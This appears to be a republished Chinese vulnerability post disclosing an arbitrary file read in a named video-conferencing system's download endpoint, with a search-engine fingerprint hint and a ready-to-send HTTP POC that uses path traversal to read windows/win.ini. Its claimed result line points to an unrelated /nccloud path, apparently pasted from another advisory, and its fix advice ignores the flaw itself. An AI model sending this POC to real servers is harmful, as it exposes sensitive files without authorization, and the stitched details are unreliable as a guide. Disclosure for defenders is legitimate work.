0x02
漏洞概述
Vulnerability Overview
某某通是国内云视频会议知名品牌,专注为教育、集团企业等用户提供“云+端+业务全场景”解决方案。
公司视频会议系统的文件(fastmeeting) /register/toDownload.do?fileName=存在任意文件遍历漏洞,未经授权的攻击者通过漏洞可以通过fileName参数读取任意文件,获取服务器敏感信息。
(文章仅限技术交流,禁止非授权操作!)
0x03
漏洞复现
Vulnerability Recurrence
fofa:详见下图空间指纹
1.参照如下POC语句并做执行
GET /register/toDownload.
do
?fileName=../../../**********../../windows/win.ini HTTP/
1.1
Host:
{Hostname}
:port
User-
Agent:
Mozilla/
5.0
(Windows NT
10.0
; Win64; x64) AppleWebKit/
537.36
(KHTML, like Gecko) Chrome/
83.0
.
4103.116
Safari/
537.36
Content-
Length:
0
-------------------------------------------
##其中Hostname为目标漏洞平台的实际地址或域名
2.发送数据包后效果如下:
http:
//Hostname:port/nccloud/ncchr_log.jsp.jsp
-------------------------------------------
##其中Hostname为目标漏洞平台的实际地址或域名
(文章仅限技术交流,禁止非授权操作!)
0x04
漏洞脚本
Vulnerability script
1.空间指纹截图如下:
0x05
修复建议
Repair Suggestions
1.实施产品的权限访问控制,降低互联网搜索引擎的查询。
2.加强后台认证要求(如AAAA策略等),提高口令的安全性。
3.增强关键页面的安全性,提升WEB后台的安全访问控制权限能力。
原文始发于微信公众号(数字人才创研院):漏洞复现|某某通视频会议存在任意文件读取漏洞 [附POC]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论